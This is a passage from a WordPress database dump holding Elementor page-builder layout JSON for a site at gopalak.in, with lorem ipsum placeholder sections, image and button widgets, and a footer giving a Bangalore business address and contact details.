luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8685,1509,'_elementor_page_assets','a:0:{}'),(8687,1510,'_elementor_edit_mode','builder'),(8688,1510,'_elementor_template_type','wp-page'),(8689,1510,'_elementor_version','3.7.7'),(8690,1510,'_wp_page_template','elementor_canvas'),(8691,1510,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 